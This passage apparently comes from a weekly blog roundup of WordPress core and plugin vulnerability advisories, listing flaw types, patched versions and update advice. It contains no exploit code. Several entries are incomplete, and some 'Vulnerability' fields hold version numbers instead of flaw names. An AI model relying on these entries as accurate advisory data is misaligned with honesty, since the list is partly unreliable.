Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Style It

Plugin: Scout bazar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: nuajik

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Cross-Site Request Forgery leading to Form Metadata Deletion
Patched Version: 5.1.9.3
Recommended Action: Update to version 5.1.9.3, or a newer patched version

Plugin: Custom My Account for Woocommerce

Plugin: SP Project & Document Manager

Vulnerability: Cross-Site Scripting
Patched Version: 2.6.1.4
Recommended Action: Update to version 2.6.1.4, or a newer patched version

Plugin: Code Snippets

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: Flexible Checkout Fields for WooCommerce – WooCommerce Checkout Manager

Vulnerability: Unauthenticated Arbitrary Plugin Settings Update
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: RestroPress – Online Food Ordering System

Vulnerability: Missing Authorization
Patched Version: 2.8.3.1
Recommended Action: Update to version 2.8.3.1, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.5.1
Recommended Action: Update to version 4.5.1, or a newer patched version

Plugin: WDSocialWidgets

Vulnerability: SQL Injection
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Image Gallery – Responsive Photo Gallery

Vulnerability: Responsive Photo Gallery <= 1.5.5
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Core: WordPress

Vulnerability: Open Redirect
Patched Version: 3.7.26
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.26, 3.8.26, 3.9.24, 4.0.23, 4.1.23, 4.2.20, 4.3.16, 4.4.15, 4.5.14, 4.6.11, 4.7.10, 4.8.6, 4.9.5

Plugin: Note Press

Vulnerability: Authenticated (Admin+) SQL Injection via Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: KJM Admin Notices

Plugin: Open Graphite

Vulnerability: Reflected Cross-Site Scripting via topic parameter
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: WordPress Console

Vulnerability: Missing Authorization via reload.php
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: NextGEN Gallery Sell Photo

Plugin: Contact Form 7 Integrations

Vulnerability: 1.3.10
Patched Version: 1.3.11
Recommended Action: Update to version 1.3.11, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 3.7.17
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.17, 3.8.17, 3.9.15, 4.0.14, 4.1.14, 4.2.11, 4.3.7, 4.4.6, 4.5.5, 4.6.2, 4.7.1

Plugin: Elementor Addon Elements

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.12.8
Recommended Action: Update to version 1.12.8, or a newer patched version

Plugin: Brizy – Page Builder

Vulnerability: Authenticated File Upload and Path Traversal
Patched Version: 2.3.12
Recommended Action: Update to version 2.3.12, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.3.4
Recommended Action: Update to version 4.3.4, or a newer patched version

Plugin: WP Customer Reviews

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.5.6
Recommended Action: Update to version 3.5.6, or a newer patched version

Plugin: Two Factor Authentication

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.10
Recommended Action: Update to version 1.1.10, or a newer patched version

Plugin: Ruby Help Desk

Vulnerability: Missing Authorization to Arbitrary Ticket Modification
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Automatic User Roles Switcher

Vulnerability: Missing Authorization to Privilege Escalation
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Arbitrary Shortcode Execution
Patched Version: 3.1.7
Recommended Action: Update to version 3.1.7, or a newer patched version

Plugin: Shockingly Simple Favicon

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: Ultimate Form Builder <= 8.3.2
Patched Version: 8.3.3
Recommended Action: Update to version 8.3.3, or a newer patched version

Plugin: WordPress Classifieds Plugin – Ad Directory & Listings by AWP Classifieds

Vulnerability: Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Arbitrary File Upload
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Booking Ultra Pro Appointments Booking Calendar Plugin

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: FeedStats

Vulnerability: Cross-Site Scripting
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: CAPTCHA 4WP – Antispam CAPTCHA solution for WordPress

Vulnerability: Cross-Site Request Forgery to Local File Inclusion
Patched Version: 7.1.0
Recommended Action: Update to version 7.1.0, or a newer patched version

Plugin: Block Referer Spam

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.9.5
Recommended Action: Update to version 1.1.9.5, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 4.1.12
Recommended Action: Update to version 4.1.12, or a newer patched version

Plugin: Community by PeepSo – Download from PeepSo.com

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.2.7.0
Recommended Action: Update to version 6.2.7.0, or a newer patched version

Plugin: WP Yelp Review Slider

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 7.1
Recommended Action: Update to version 7.1, or a newer patched version

Plugin: SrbTransLatin – Serbian Latinisation

Vulnerability: Stored/Reflected Cross-Site Scripting via Third Party Library
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Cross-Site Request Forgery to Plugin Installation
Patched Version: 3.4.27.1
Recommended Action: Update to version 3.4.27.1, or a newer patched version

Plugin: WP Photo Album Plus

Vulnerability: Stored Cross-Site Scripting
Patched Version: 5.4.8
Recommended Action: Update to version 5.4.8, or a newer patched version

Plugin: WP All Export Pro

Vulnerability: Cross-Site Request Forgery to PHAR Deserialization
Patched Version: 1.8.6
Recommended Action: Update to version 1.8.6, or a newer patched version

Plugin: RSVPMaker

Vulnerability: SQL Injection
Patched Version: 5.6.4
Recommended Action: Update to version 5.6.4, or a newer patched version

Plugin: Video Gallery – YouTube Playlist, Channel Gallery by YotuWP

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.3.11
Recommended Action: Update to version 1.3.11, or a newer patched version

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery via ‘instantEditRedirect’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Contact Form by FormGet – Best Form Builder Plugin for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HashBar – WordPress Notification Bar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Missing Authorization to Unauthenticated Content Injection
Patched Version: 5.1.9.3
Recommended Action: Update to version 5.1.9.3, or a newer patched version

Plugin: CM WordPress Search And Replace Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: DrawBlog

Plugin: WP Hardening (discontinued)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Stored Cross-Site Scripting via REQUEST_URI
Patched Version: 5.2.4
Recommended Action: Update to version 5.2.4, or a newer patched version

Plugin: Simple File List

Vulnerability: Arbitrary File Deletion
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: YITH WooCommerce Compare

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: WordPress GDPR

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.27
Recommended Action: Update to version 1.9.27, or a newer patched version

Plugin: Translate WordPress with GTranslate

Vulnerability: Reflected Cross Site Scripting
Patched Version: 2.8.52
Recommended Action: Update to version 2.8.52, or a newer patched version

Plugin: Media File Organizer

Plugin: WP RSS Multi Importer

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.14
Recommended Action: Update to version 3.14, or a newer patched version

Plugin: Locations

Core: WordPress

Vulnerability: Cross-Site Scripting via Javascript: and Data: URLs
Patched Version: 3.7.22
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.22, 3.8.22, 3.9.20, 4.0.19, 4.1.19, 4.2.16, 4.3.12, 4.4.11, 4.5.10, 4.6.7, 4.7.6, 4.8.2

Plugin: ReFlex Gallery » WordPress Photo Gallery

Vulnerability: Arbitrary File Upload
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.63
Recommended Action: Update to version 1.5.63, or a newer patched version

Plugin: JobSearch WP Job Board

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Lana Email Tester

Vulnerability: Missing Authorization to Mail Relay & Cross-Site Request Forgery
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Uji Countdown

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: WP Responsive Tabs horizontal vertical and accordion Tabs

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.16
Recommended Action: Update to version 1.1.16, or a newer patched version

Plugin: Multi Step Form

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Simple Gmail Login

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Pricing Table

Plugin: Category Order and Taxonomy Terms Order

Vulnerability: Authenticated PHP Object Injection
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Responsive Vertical Icon Menu

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: URL Shortify – Simple, Powerful and Easy URL Shortener Plugin For WordPress

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: AdminOnline

Vulnerability: Directly Traversal/Arbitrary File Read
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: S3 Bubble Amazon S3 HTML5 Video with Adverts

Plugin: One Click Demo Import

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: Calendar

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: wpForo Forum

Vulnerability: SQL Injection
Patched Version: 1.4.13
Recommended Action: Update to version 1.4.13, or a newer patched version

Plugin: Easy Social Icons

Vulnerability: SQL Injection
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Download Manager

Vulnerability: Unauthenticated Brute Force of File Master Key
Patched Version: 3.2.39
Recommended Action: Update to version 3.2.39, or a newer patched version

Plugin: Timed Popup WordPress Plugin

Plugin: Google XML Sitemap for Videos

Plugin: W4 Post List

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via ‘w4pl[no_items_text]’
Patched Version: 2.4.5
Recommended Action: Update to version 2.4.5, or a newer patched version

Plugin: Better Follow Button for Jetpack

Plugin: Job Manager

Vulnerability: Insecure Direct Object Reference
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CalderaWP License Manager

Plugin: oEmbed Gist

Plugin: HTTP Headers

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.19.0
Recommended Action: Update to version 1.19.0, or a newer patched version

Plugin: Auto Limit Posts Reloaded

Plugin: Bulk Page Creator

Vulnerability: Cross-Site Request Forgery to Arbitrary Page Creation
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Improper Authorization to Price Change
Patched Version: 5.1.9.3
Recommended Action: Update to version 5.1.9.3, or a newer patched version

Plugin: AnyComment

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.2.18
Recommended Action: Update to version 0.2.18, or a newer patched version

Plugin: WPGYM – WordPress Gym Management System

Vulnerability: WordPress Gym Management System (Unknown Version)
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Admin Menu

Plugin: Product Views for WooCommerce – Product Slider, Grid, Ticker, List & Masonry

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: Simple File List

Vulnerability: Arbitrary File Download
Patched Version: 3.2.8
Recommended Action: Update to version 3.2.8, or a newer patched version

Plugin: Translate WordPress with GTranslate

Vulnerability: Missing Authorization to Sensitive Information Disclosure
Patched Version: 2.9.9
Recommended Action: Update to version 2.9.9, or a newer patched version

Plugin: Calendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Bus Ticket Booking with Seat Reservation – WpBusTicketly | WordPress plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.2.4
Recommended Action: Update to version 5.2.4, or a newer patched version

Plugin: Vuukle Comments, Reactions, Share Bar, Revenue

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: CM Pop-Up Banners for WordPress

Vulnerability: Authenticated (Subscriber+) SQL Injection via getStatistics
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: WordPress Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Privilege Escalation
Patched Version: 4.9.21
Recommended Action: Update to version 4.9.21, or a newer patched version

Plugin: MainWP Child Reports

Vulnerability: Admin+ SQL Injection
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection via WP_Date_Query
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3

Plugin: GamiPress – Gamification plugin to reward points, achievements, badges & ranks in WordPress

Vulnerability: Cross-Site Request Forgery to User Earnings Deletion
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Unauthenticated Options Changes via wp_route
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Unauthenticated Option Creation
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: Accordion

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting via accordion settings
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: Professional Social Sharing Buttons, Icons & Related Posts – Shareaholic

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 9.7.9
Recommended Action: Update to version 9.7.9, or a newer patched version

Plugin: Browser and Operating System Finder

Plugin: 3D Flick Slideshow

Vulnerability: Arbitrary File Upload
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Googmonify

Plugin: Auto YouTube Importer

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: YOP Poll

Vulnerability: IP Spoofing via X-Forwarded-For header
Patched Version: 6.4.3
Recommended Action: Update to version 6.4.3, or a newer patched version

Plugin: Woocommerce Shipping Canada Post

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: Easy Table of Contents

Vulnerability: Missing Authorization via eztoc_reset_options_to_default
Patched Version: 2.0.46
Recommended Action: Update to version 2.0.46, or a newer patched version

Plugin: Form builder to get in touch with visitors and grow your email list — Happyforms

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.25.10
Recommended Action: Update to version 1.25.10, or a newer patched version

Plugin: Recipe Card Blocks for Gutenberg & Elementor – Best WordPress Recipe Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: Easy Testimonials

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.37
Recommended Action: Update to version 1.37, or a newer patched version

Plugin: Appointment Booking Calendar Plugin and Scheduling Plugin – BookingPress

Vulnerability: SQL Injection
Patched Version: 1.0.11
Recommended Action: Update to version 1.0.11, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Attachment Name #2
Patched Version: 3.7.15
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.15, 3.8.15, 3.9.13, 4.0.12, 4.1.12, 4.2.9, 4.3.5, 4.4.4, 4.5.3

Plugin: Count per Day

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.5.5
Recommended Action: Update to version 3.5.5, or a newer patched version

Plugin: woocommerce-one-page-checkout

Vulnerability: Authenticated (Contributor+) Local File Inclusion via `woocommerce_one_page_checkout`
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Site Offline or Coming Soon

Plugin: CSS Hero

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.07
Recommended Action: Update to version 4.07, or a newer patched version

Plugin: Pagination by BestWebSoft – Customizable WordPress Content Splitter and Navigation Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Exchange Addon Custom URL Tracking

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Nifty Newsletters (Formerly Sola Newsletters)

Plugin: Sitemap

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.4
Recommended Action: Update to version 4.4, or a newer patched version

Plugin: RokNewsPager

Vulnerability: Path Disclosure
Patched Version: 1.18
Recommended Action: Update to version 1.18, or a newer patched version

Plugin: GenerateBlocks

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: WP iCommerce – the first interactive ecommerce for wordpress

Plugin: WPFront User Role Editor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: Current Book

Plugin: Ultimate Product Catalog

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.0.26
Recommended Action: Update to version 5.0.26, or a newer patched version

Plugin: Bug Library

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Booking Calendar Contact Form

Vulnerability: Shortcode SQL Injection
Patched Version: 1.0.24
Recommended Action: Update to version 1.0.24, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Arbitrary File Upload
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Simple Events Calendar

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: Checkout Field Manager (Checkout Manager) for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 7.3.1
Recommended Action: Update to version 7.3.1, or a newer patched version

Plugin: iMember360is

Vulnerability: Missing Authorization and Sensitive Data Exposure
Patched Version: 3.9.001
Recommended Action: Update to version 3.9.001, or a newer patched version

***

Check out the Watch Out Wednesday Archive for past Watch Out Wednesday posts.

About the Author

Odell Duppins Jr

Well qualified professional with plenty of hands on experience with various technologies. Excellent analytical and troubleshooting skills with a keen ability of developing and/or simplifying processes by finding and developing new innovative solutions.